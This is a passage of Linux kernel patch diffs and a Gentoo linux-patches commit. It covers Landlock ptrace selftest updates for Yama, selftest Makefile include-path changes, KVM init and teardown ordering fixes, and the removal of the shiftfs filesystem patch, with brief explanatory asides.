++	if (read(fd, buf, 1) < 0) {
++		close(fd);
++		return -1;
++	}
++
++	ret = atoi(buf);
++	close(fd);
++	return ret;
++}
++
+ /* clang-format off */
+ FIXTURE(hierarchy) {};
+ /* clang-format on */
+@@ -232,8 +257,51 @@ TEST_F(hierarchy, trace)
+ 	pid_t child, parent;
+ 	int status, err_proc_read;
+ 	int pipe_child[2], pipe_parent[2];
++	int yama_ptrace_scope;
+ 	char buf_parent;
+ 	long ret;
++	bool can_read_child, can_trace_child, can_read_parent, can_trace_parent;
++
++	yama_ptrace_scope = get_yama_ptrace_scope();
++	ASSERT_LE(0, yama_ptrace_scope);
++
++	if (yama_ptrace_scope > YAMA_SCOPE_DISABLED)
++		TH_LOG("Incomplete tests due to Yama restrictions (scope %d)",
++		       yama_ptrace_scope);
++
++	/*
++	 * can_read_child is true if a parent process can read its child
++	 * process, which is only the case when the parent process is not
++	 * isolated from the child with a dedicated Landlock domain.
++	 */
++	can_read_child = !variant->domain_parent;
++
++	/*
++	 * can_trace_child is true if a parent process can trace its child
++	 * process.  This depends on two conditions:
++	 * - The parent process is not isolated from the child with a dedicated
++	 *   Landlock domain.
++	 * - Yama allows tracing children (up to YAMA_SCOPE_RELATIONAL).
++	 */
++	can_trace_child = can_read_child &&
++			  yama_ptrace_scope <= YAMA_SCOPE_RELATIONAL;
++
++	/*
++	 * can_read_parent is true if a child process can read its parent
++	 * process, which is only the case when the child process is not
++	 * isolated from the parent with a dedicated Landlock domain.
++	 */
++	can_read_parent = !variant->domain_child;
++
++	/*
++	 * can_trace_parent is true if a child process can trace its parent
++	 * process.  This depends on two conditions:
++	 * - The child process is not isolated from the parent with a dedicated
++	 *   Landlock domain.
++	 * - Yama is disabled (YAMA_SCOPE_DISABLED).
++	 */
++	can_trace_parent = can_read_parent &&
++			   yama_ptrace_scope <= YAMA_SCOPE_DISABLED;
+ 
+ 	/*
+ 	 * Removes all effective and permitted capabilities to not interfere
+@@ -264,16 +332,21 @@ TEST_F(hierarchy, trace)
+ 		/* Waits for the parent to be in a domain, if any. */
+ 		ASSERT_EQ(1, read(pipe_parent[0], &buf_child, 1));
+ 
+-		/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the parent. */
++		/* Tests PTRACE_MODE_READ on the parent. */
+ 		err_proc_read = test_ptrace_read(parent);
++		if (can_read_parent) {
++			EXPECT_EQ(0, err_proc_read);
++		} else {
++			EXPECT_EQ(EACCES, err_proc_read);
++		}
++
++		/* Tests PTRACE_ATTACH on the parent. */
+ 		ret = ptrace(PTRACE_ATTACH, parent, NULL, 0);
+-		if (variant->domain_child) {
++		if (can_trace_parent) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-			EXPECT_EQ(EACCES, err_proc_read);
+-		} else {
+-			EXPECT_EQ(0, ret);
+-			EXPECT_EQ(0, err_proc_read);
+ 		}
+ 		if (ret == 0) {
+ 			ASSERT_EQ(parent, waitpid(parent, &status, 0));
+@@ -283,11 +356,11 @@ TEST_F(hierarchy, trace)
+ 
+ 		/* Tests child PTRACE_TRACEME. */
+ 		ret = ptrace(PTRACE_TRACEME);
+-		if (variant->domain_parent) {
++		if (can_trace_child) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-		} else {
+-			EXPECT_EQ(0, ret);
+ 		}
+ 
+ 		/*
+@@ -296,7 +369,7 @@ TEST_F(hierarchy, trace)
+ 		 */
+ 		ASSERT_EQ(1, write(pipe_child[1], ".", 1));
+ 
+-		if (!variant->domain_parent) {
++		if (can_trace_child) {
+ 			ASSERT_EQ(0, raise(SIGSTOP));
+ 		}
+ 
+@@ -321,7 +394,7 @@ TEST_F(hierarchy, trace)
+ 	ASSERT_EQ(1, read(pipe_child[0], &buf_parent, 1));
+ 
+ 	/* Tests child PTRACE_TRACEME. */
+-	if (!variant->domain_parent) {
++	if (can_trace_child) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+ 		ASSERT_EQ(0, ptrace(PTRACE_DETACH, child, NULL, 0));
+@@ -331,17 +404,23 @@ TEST_F(hierarchy, trace)
+ 		EXPECT_EQ(ESRCH, errno);
+ 	}
+ 
+-	/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the child. */
++	/* Tests PTRACE_MODE_READ on the child. */
+ 	err_proc_read = test_ptrace_read(child);
++	if (can_read_child) {
++		EXPECT_EQ(0, err_proc_read);
++	} else {
++		EXPECT_EQ(EACCES, err_proc_read);
++	}
++
++	/* Tests PTRACE_ATTACH on the child. */
+ 	ret = ptrace(PTRACE_ATTACH, child, NULL, 0);
+-	if (variant->domain_parent) {
++	if (can_trace_child) {
++		EXPECT_EQ(0, ret);
++	} else {
+ 		EXPECT_EQ(-1, ret);
+ 		EXPECT_EQ(EPERM, errno);
+-		EXPECT_EQ(EACCES, err_proc_read);
+-	} else {
+-		EXPECT_EQ(0, ret);
+-		EXPECT_EQ(0, err_proc_read);
+ 	}
++
+ 	if (ret == 0) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+diff --git a/tools/testing/selftests/media_tests/Makefile b/tools/testing/selftests/media_tests/Makefile
+index 60826d7d37d49..471d83e61d95e 100644
+--- a/tools/testing/selftests/media_tests/Makefile
++++ b/tools/testing/selftests/media_tests/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+-CFLAGS += -I../ -I../../../../usr/include/
++CFLAGS += -I../ $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := media_device_test media_device_open video_device_test
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/membarrier/Makefile b/tools/testing/selftests/membarrier/Makefile
+index 34d1c81a2324a..fc840e06ff565 100644
+--- a/tools/testing/selftests/membarrier/Makefile
++++ b/tools/testing/selftests/membarrier/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ 
+ TEST_GEN_PROGS := membarrier_test_single_thread \
+diff --git a/tools/testing/selftests/mount_setattr/Makefile b/tools/testing/selftests/mount_setattr/Makefile
+index 2250f7dcb81e3..fde72df01b118 100644
+--- a/tools/testing/selftests/mount_setattr/Makefile
++++ b/tools/testing/selftests/mount_setattr/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2 -pthread
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2 -pthread
+ 
+ TEST_GEN_FILES += mount_setattr_test
+ 
+diff --git a/tools/testing/selftests/move_mount_set_group/Makefile b/tools/testing/selftests/move_mount_set_group/Makefile
+index 80c2d86812b06..94235846b6f9b 100644
+--- a/tools/testing/selftests/move_mount_set_group/Makefile
++++ b/tools/testing/selftests/move_mount_set_group/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2
+ 
+ TEST_GEN_FILES += move_mount_set_group_test
+ 
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index 5637b5dadabdb..70ea8798b1f60 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -2065,6 +2065,8 @@ EOF
+ ################################################################################
+ # main
+ 
++trap cleanup EXIT
++
+ while getopts :t:pPhv o
+ do
+ 	case $o in
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index 4058c7451e70d..f35a924d4a303 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -214,11 +214,10 @@ static void do_verify_udp(const char *data, int len)
+ 
+ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ {
+-	char control[CMSG_SPACE(sizeof(uint16_t))] = {0};
++	char control[CMSG_SPACE(sizeof(int))] = {0};
+ 	struct msghdr msg = {0};
+ 	struct iovec iov = {0};
+ 	struct cmsghdr *cmsg;
+-	uint16_t *gsosizeptr;
+ 	int ret;
+ 
+ 	iov.iov_base = buf;
+@@ -237,8 +236,7 @@ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ 		     cmsg = CMSG_NXTHDR(&msg, cmsg)) {
+ 			if (cmsg->cmsg_level == SOL_UDP
+ 			    && cmsg->cmsg_type == UDP_GRO) {
+-				gsosizeptr = (uint16_t *) CMSG_DATA(cmsg);
+-				*gso_size = *gsosizeptr;
++				*gso_size = *(int *)CMSG_DATA(cmsg);
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/testing/selftests/perf_events/Makefile b/tools/testing/selftests/perf_events/Makefile
+index fcafa5f0d34c0..db93c4ff081a4 100644
+--- a/tools/testing/selftests/perf_events/Makefile
++++ b/tools/testing/selftests/perf_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ 
+ TEST_GEN_PROGS := sigtrap_threads remove_on_exec
+diff --git a/tools/testing/selftests/pid_namespace/Makefile b/tools/testing/selftests/pid_namespace/Makefile
+index edafaca1aeb39..9286a1d22cd3a 100644
+--- a/tools/testing/selftests/pid_namespace/Makefile
++++ b/tools/testing/selftests/pid_namespace/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = regression_enomem
+ 
+diff --git a/tools/testing/selftests/pidfd/Makefile b/tools/testing/selftests/pidfd/Makefile
+index 778b6cdc8aed8..d731e3e76d5bf 100644
+--- a/tools/testing/selftests/pidfd/Makefile
++++ b/tools/testing/selftests/pidfd/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/ -pthread -Wall
++CFLAGS += -g $(KHDR_INCLUDES) -pthread -Wall
+ 
+ TEST_GEN_PROGS := pidfd_test pidfd_fdinfo_test pidfd_open_test \
+ 	pidfd_poll_test pidfd_wait pidfd_getfd_test pidfd_setns_test
+diff --git a/tools/testing/selftests/powerpc/ptrace/Makefile b/tools/testing/selftests/powerpc/ptrace/Makefile
+index 2f02cb54224dc..cbeeaeae8837a 100644
+--- a/tools/testing/selftests/powerpc/ptrace/Makefile
++++ b/tools/testing/selftests/powerpc/ptrace/Makefile
+@@ -33,7 +33,7 @@ TESTS_64 := $(patsubst %,$(OUTPUT)/%,$(TESTS_64))
+ $(TESTS_64): CFLAGS += -m64
+ $(TM_TESTS): CFLAGS += -I../tm -mhtm
+ 
+-CFLAGS += -I../../../../../usr/include -fno-pie
++CFLAGS += $(KHDR_INCLUDES) -fno-pie
+ 
+ $(OUTPUT)/ptrace-gpr: ptrace-gpr.S
+ $(OUTPUT)/ptrace-pkey $(OUTPUT)/core-pkey: LDLIBS += -pthread
+diff --git a/tools/testing/selftests/powerpc/security/Makefile b/tools/testing/selftests/powerpc/security/Makefile
+index 7488315fd8474..e0d979ab02040 100644
+--- a/tools/testing/selftests/powerpc/security/Makefile
++++ b/tools/testing/selftests/powerpc/security/Makefile
+@@ -5,7 +5,7 @@ TEST_PROGS := mitigation-patching.sh
+ 
+ top_srcdir = ../../../../..
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ include ../../lib.mk
+ 
+diff --git a/tools/testing/selftests/powerpc/syscalls/Makefile b/tools/testing/selftests/powerpc/syscalls/Makefile
+index b63f8459c704e..d1f2648b112b6 100644
+--- a/tools/testing/selftests/powerpc/syscalls/Makefile
++++ b/tools/testing/selftests/powerpc/syscalls/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ TEST_GEN_PROGS := ipc_unmuxed rtas_filter
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ top_srcdir = ../../../../..
+ include ../../lib.mk
+diff --git a/tools/testing/selftests/powerpc/tm/Makefile b/tools/testing/selftests/powerpc/tm/Makefile
+index 5881e97c73c13..3876805c2f312 100644
+--- a/tools/testing/selftests/powerpc/tm/Makefile
++++ b/tools/testing/selftests/powerpc/tm/Makefile
+@@ -17,7 +17,7 @@ $(TEST_GEN_PROGS): ../harness.c ../utils.c
+ CFLAGS += -mhtm
+ 
+ $(OUTPUT)/tm-syscall: tm-syscall-asm.S
+-$(OUTPUT)/tm-syscall: CFLAGS += -I../../../../../usr/include
++$(OUTPUT)/tm-syscall: CFLAGS += $(KHDR_INCLUDES)
+ $(OUTPUT)/tm-tmspr: CFLAGS += -pthread
+ $(OUTPUT)/tm-vmx-unavail: CFLAGS += -pthread -m64
+ $(OUTPUT)/tm-resched-dscr: ../pmu/lib.c
+diff --git a/tools/testing/selftests/ptp/Makefile b/tools/testing/selftests/ptp/Makefile
+index ef06de0898b73..eeab44cc68638 100644
+--- a/tools/testing/selftests/ptp/Makefile
++++ b/tools/testing/selftests/ptp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_PROGS := testptp
+ LDLIBS += -lrt
+ all: $(TEST_PROGS)
+diff --git a/tools/testing/selftests/rseq/Makefile b/tools/testing/selftests/rseq/Makefile
+index 215e1067f0376..3a173e184566c 100644
+--- a/tools/testing/selftests/rseq/Makefile
++++ b/tools/testing/selftests/rseq/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/ -L$(OUTPUT) -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -L$(OUTPUT) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread -ldl
+ 
+diff --git a/tools/testing/selftests/sched/Makefile b/tools/testing/selftests/sched/Makefile
+index 10c72f14fea9d..099ee9213557a 100644
+--- a/tools/testing/selftests/sched/Makefile
++++ b/tools/testing/selftests/sched/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/  -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread
+ 
+diff --git a/tools/testing/selftests/seccomp/Makefile b/tools/testing/selftests/seccomp/Makefile
+index f017c382c0369..584fba4870372 100644
+--- a/tools/testing/selftests/seccomp/Makefile
++++ b/tools/testing/selftests/seccomp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -isystem ../../../../usr/include/
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ LDLIBS += -lcap
+ 
+diff --git a/tools/testing/selftests/sync/Makefile b/tools/testing/selftests/sync/Makefile
+index d0121a8a3523a..df0f91bf6890d 100644
+--- a/tools/testing/selftests/sync/Makefile
++++ b/tools/testing/selftests/sync/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ CFLAGS += -O2 -g -std=gnu89 -pthread -Wall -Wextra
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDFLAGS += -pthread
+ 
+ .PHONY: all clean
+diff --git a/tools/testing/selftests/user_events/Makefile b/tools/testing/selftests/user_events/Makefile
+index c765d8635d9af..87d54c6400681 100644
+--- a/tools/testing/selftests/user_events/Makefile
++++ b/tools/testing/selftests/user_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDLIBS += -lrt -lpthread -lm
+ 
+ TEST_GEN_PROGS = ftrace_test dyn_test perf_test
+diff --git a/tools/testing/selftests/vm/Makefile b/tools/testing/selftests/vm/Makefile
+index 89c14e41bd437..ac9366065fd26 100644
+--- a/tools/testing/selftests/vm/Makefile
++++ b/tools/testing/selftests/vm/Makefile
+@@ -25,7 +25,7 @@ MACHINE ?= $(shell echo $(uname_M) | sed -e 's/aarch64.*/arm64/' -e 's/ppc64.*/p
+ # LDLIBS.
+ MAKEFLAGS += --no-builtin-rules
+ 
+-CFLAGS = -Wall -I $(top_srcdir) -I $(top_srcdir)/usr/include $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
++CFLAGS = -Wall -I $(top_srcdir) $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
+ LDLIBS = -lrt -lpthread
+ TEST_GEN_FILES = cow
+ TEST_GEN_FILES += compaction_test
+diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
+index 0388c4d60af0e..ca9374b56ead1 100644
+--- a/tools/testing/selftests/x86/Makefile
++++ b/tools/testing/selftests/x86/Makefile
+@@ -34,7 +34,7 @@ BINARIES_64 := $(TARGETS_C_64BIT_ALL:%=%_64)
+ BINARIES_32 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_32))
+ BINARIES_64 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_64))
+ 
+-CFLAGS := -O2 -g -std=gnu99 -pthread -Wall
++CFLAGS := -O2 -g -std=gnu99 -pthread -Wall $(KHDR_INCLUDES)
+ 
+ # call32_from_64 in thunks.S uses absolute addresses.
+ ifeq ($(CAN_BUILD_WITH_NOPIE),1)
+diff --git a/tools/tracing/rtla/src/osnoise_hist.c b/tools/tracing/rtla/src/osnoise_hist.c
+index 5d7ea479ac89f..fe34452fc4ec0 100644
+--- a/tools/tracing/rtla/src/osnoise_hist.c
++++ b/tools/tracing/rtla/src/osnoise_hist.c
+@@ -121,6 +121,7 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ {
+ 	struct osnoise_hist_params *params = tool->params;
+ 	struct osnoise_hist_data *data = tool->data;
++	unsigned long long total_duration;
+ 	int entries = data->entries;
+ 	int bucket;
+ 	int *hist;
+@@ -131,10 +132,12 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ 	if (data->bucket_size)
+ 		bucket = duration / data->bucket_size;
+ 
++	total_duration = duration * count;
++
+ 	hist = data->hist[cpu].samples;
+ 	data->hist[cpu].count += count;
+ 	update_min(&data->hist[cpu].min_sample, &duration);
+-	update_sum(&data->hist[cpu].sum_sample, &duration);
++	update_sum(&data->hist[cpu].sum_sample, &total_duration);
+ 	update_max(&data->hist[cpu].max_sample, &duration);
+ 
+ 	if (bucket < entries)
+diff --git a/virt/kvm/coalesced_mmio.c b/virt/kvm/coalesced_mmio.c
+index 0be80c213f7f2..5ef88f5a08640 100644
+--- a/virt/kvm/coalesced_mmio.c
++++ b/virt/kvm/coalesced_mmio.c
+@@ -187,15 +187,17 @@ int kvm_vm_ioctl_unregister_coalesced_mmio(struct kvm *kvm,
+ 			r = kvm_io_bus_unregister_dev(kvm,
+ 				zone->pio ? KVM_PIO_BUS : KVM_MMIO_BUS, &dev->dev);
+ 
++			kvm_iodevice_destructor(&dev->dev);
++
+ 			/*
+ 			 * On failure, unregister destroys all devices on the
+ 			 * bus _except_ the target device, i.e. coalesced_zones
+-			 * has been modified.  No need to restart the walk as
+-			 * there aren't any zones left.
++			 * has been modified.  Bail after destroying the target
++			 * device, there's no need to restart the walk as there
++			 * aren't any zones left.
+ 			 */
+ 			if (r)
+ 				break;
+-			kvm_iodevice_destructor(&dev->dev);
+ 		}
+ 	}
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 9c60384b5ae0b..07aae60288f92 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -5995,12 +5995,6 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 
+ 	kvm_chardev_ops.owner = module;
+ 
+-	r = misc_register(&kvm_dev);
+-	if (r) {
+-		pr_err("kvm: misc device register failed\n");
+-		goto out_unreg;
+-	}
+-
+ 	register_syscore_ops(&kvm_syscore_ops);
+ 
+ 	kvm_preempt_ops.sched_in = kvm_sched_in;
+@@ -6009,11 +6003,24 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 	kvm_init_debug();
+ 
+ 	r = kvm_vfio_ops_init();
+-	WARN_ON(r);
++	if (WARN_ON_ONCE(r))
++		goto err_vfio;
++
++	/*
++	 * Registration _must_ be the very last thing done, as this exposes
++	 * /dev/kvm to userspace, i.e. all infrastructure must be set up!
++	 */
++	r = misc_register(&kvm_dev);
++	if (r) {
++		pr_err("kvm: misc device register failed\n");
++		goto err_register;
++	}
+ 
+ 	return 0;
+ 
+-out_unreg:
++err_register:
++	kvm_vfio_ops_exit();
++err_vfio:
+ 	kvm_async_pf_deinit();
+ out_free_4:
+ 	for_each_possible_cpu(cpu)
+@@ -6039,8 +6046,14 @@ void kvm_exit(void)
+ {
+ 	int cpu;
+ 
+-	debugfs_remove_recursive(kvm_debugfs_dir);
++	/*
++	 * Note, unregistering /dev/kvm doesn't strictly need to come first, as
++	 * fops_get(), a.k.a. try_module_get(), prevents acquiring references
++	 * to KVM while the module is being stopped.
++	 */
+ 	misc_deregister(&kvm_dev);
++
++	debugfs_remove_recursive(kvm_debugfs_dir);
+ 	for_each_possible_cpu(cpu)
+ 		free_cpumask_var(per_cpu(cpu_kick_mask, cpu));
+ 	kmem_cache_destroy(kvm_vcpu_cache);

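The kvm_main.c hunk above moves misc_register() to the very end of
kvm_init() and makes kvm_exit() deregister /dev/kvm before anything else.
A minimal userspace sketch of that register-last, unregister-first
discipline follows; the function names are illustrative stand-ins, not
real KVM symbols.

#include <stdio.h>

/* Illustrative stand-ins for the real init/teardown steps. */
static int init_internal_state(void)        { puts("state ready"); return 0; }
static void teardown_internal_state(void)   { puts("state torn down"); }
static int register_userspace_dev(void)     { puts("device exposed"); return 0; }
static void unregister_userspace_dev(void)  { puts("device hidden"); }

static int subsys_init(void)
{
	int r = init_internal_state();

	if (r)
		return r;

	/* Register last: once the device is visible, userspace can race in,
	 * so every other piece must already be initialized. */
	r = register_userspace_dev();
	if (r)
		teardown_internal_state();
	return r;
}

static void subsys_exit(void)
{
	/* Unregister first so no new users appear during teardown. */
	unregister_userspace_dev();
	teardown_internal_state();
}

int main(void)
{
	if (subsys_init() == 0)
		subsys_exit();
	return 0;
}

The same ordering explains the reworked error unwinding in the hunk: a
failure after registration would otherwise leave a half-initialized
device reachable from userspace.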

* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-03 13:02 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-03 13:02 UTC (permalink / raw
  To: gentoo-commits

commit:     a562522fe3f6aee0aaebe87bed2a32a33d739bf4
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 13:02:05 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 13:02:05 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a562522f

Remove shiftfs until I fix the patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 -
 5000_shiftfs-6.2-2023-01-31.patch | 6607 -------------------------------------
 2 files changed, 6611 deletions(-)

diff --git a/0000_README b/0000_README
index b2b768d6..49d3a418 100644
--- a/0000_README
+++ b/0000_README
@@ -87,10 +87,6 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
-Patch:  5000_shiftfs-6.2-2023-01-31.patch
-From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
-Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
-
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

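The patch removed below implements shiftfs, a uid/gid-shifting stacking
filesystem. Its commit messages describe a two-step workflow: real root
(CAP_SYS_ADMIN in the initial user namespace) first marks a subtree as
shiftable, then root in a container's user namespace mounts the marked
subtree with shifted ids. A minimal sketch of those two mount(2) calls,
with a hypothetical path and error handling reduced to perror():

#include <stdio.h>
#include <sys/mount.h>

int main(void)
{
	/* Hypothetical path; in practice this is a container root volume. */
	const char *subtree = "/volumes/ct1";

	/* Step 1 (initial userns, CAP_SYS_ADMIN): mark the subtree as
	 * shiftable.  shiftfs takes the subtree path as the mount source. */
	if (mount(subtree, subtree, "shiftfs", 0, "mark") < 0)
		perror("mark mount");

	/* Step 2 (root in the container's user namespace): mount the marked
	 * subtree; ids are then mapped through the superblock user ns. */
	if (mount(subtree, "/mnt", "shiftfs", 0, NULL) < 0)
		perror("shiftfs mount");

	return 0;
}

Both steps are shown in one program only for brevity; in real use the
second mount runs inside the container's mount and user namespaces.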
diff --git a/5000_shiftfs-6.2-2023-01-31.patch b/5000_shiftfs-6.2-2023-01-31.patch
deleted file mode 100644
index 44603abb..00000000
--- a/5000_shiftfs-6.2-2023-01-31.patch
+++ /dev/null
@@ -1,6607 +0,0 @@
-From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
-From: James Bottomley <James.Bottomley@HansenPartnership.com>
-Date: Thu, 4 Apr 2019 15:39:11 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-This allows any subtree to be uid/gid shifted and bound elsewhere.  It
-does this by operating similarly to overlayfs.  Its primary use is for
-shifting the underlying uids of filesystems used to support
-unprivileged (uid shifted) containers.  The usual use case here is
-that the container is operating with a uid shifted unprivileged root
-but sometimes needs to make use of or work with a filesystem image
-that has root at real uid 0.
-
-The mechanism is to allow any subordinate mount namespace to mount a
-shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
-it to mount marked subtrees (using the -o mark option as root).  Once
-mounted, the subtree is mapped via the super block user namespace so
-that the interior ids of the mounting user namespace are the ids
-written to the filesystem.
-
-Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
-[ saf: use designated initializers for path declarations to fix errors
-  with struct randomization ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-[update: port to 5.0]
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig                 |   8 +
- fs/Makefile                |   1 +
- fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
- include/uapi/linux/magic.h |   2 +
- 4 files changed, 791 insertions(+)
- create mode 100644 fs/shiftfs.c
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index 2685a4d0d353..b53bece1e940 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
- source "fs/fuse/Kconfig"
- source "fs/overlayfs/Kconfig"
- 
-+config SHIFT_FS
-+	tristate "UID/GID shifting overlay filesystem for containers"
-+	help
-+	  This filesystem can overlay any mounted filesystem and shift
-+	  the uid/gid the files appear at.  The idea is that
-+	  unprivileged containers can use this to mount root volumes
-+	  using this technique.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/Makefile b/fs/Makefile
-index 4dea17840761..628632dcb9b1 100644
---- a/fs/Makefile
-+++ b/fs/Makefile
-@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
- obj-$(CONFIG_EROFS_FS)		+= erofs/
- obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
- obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
-+obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-new file mode 100644
-index 000000000000..f7cada126daa
---- /dev/null
-+++ b/fs/shiftfs.c
-@@ -0,0 +1,780 @@
-+#include <linux/cred.h>
-+#include <linux/mount.h>
-+#include <linux/file.h>
-+#include <linux/fs.h>
-+#include <linux/namei.h>
-+#include <linux/module.h>
-+#include <linux/kernel.h>
-+#include <linux/magic.h>
-+#include <linux/parser.h>
-+#include <linux/seq_file.h>
-+#include <linux/statfs.h>
-+#include <linux/slab.h>
-+#include <linux/user_namespace.h>
